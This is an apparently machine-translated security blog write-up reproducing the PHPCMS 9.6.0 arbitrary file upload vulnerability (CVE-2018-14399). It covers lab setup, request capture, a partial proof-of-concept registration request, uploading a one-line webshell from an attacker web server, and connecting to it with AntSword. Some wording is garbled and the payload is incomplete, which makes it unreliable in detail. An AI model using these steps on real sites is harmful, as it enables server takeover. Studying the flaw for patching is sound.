phpcms v9.6.0 Arbitrary File Upload Vulnerability (CVE-2018-14399)

2022-04-28Clicks: 7948


1. Vulnerability description

PHPCMS 9.6.libs/classes/attachment in version 0.class.There is a vulnerability in the php file, which is caused by the PHPCMS program not checking the file type properly when downloading remote/local files。A remote attacker could exploit the vulnerability to upload and execute arbitrary PHP code。

The vulnerability affects the version

PHPCMS 9.6.0

Third, vulnerability environment construction

1. Official download phpcms v9.6.Version 0, download address: http://download.phpcms.cn/v9/9.6/

2. Unzip the downloaded file, then put the file into the phpstudy site root directory, browser to go to 192.168.10.171/phpcms/install/install.php, start the installation

3. After the installation is complete, log in to the background and generate the home page

Fourth, the vulnerability is repeated

1.Browser to the front desk to register a member

2.Click on the registration page and grab the package

3.On another system (kali), open the web service, and then create a txt file in the web root directory and write the following information

4.Construct POC, upload a word Trojan

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]= &dosubmit=1&protocol=

Modify the packet and add the POC. Note that when testing go in the repeater, the username, password, and email field values are changed each time to ensure that they cannot be repeated。

5.Modified the captured packet content and added the POC

6.You can see that the content of the returned package contains the path of the uploaded file

7.Ant-sword connection

Shandong Yuntian Safety Technology Co., LTD. All rights reserved Lu ICP No. 17007379-1

Lu public network Anbei 37010202002190

" class="hidden">郑州方特欢乐世界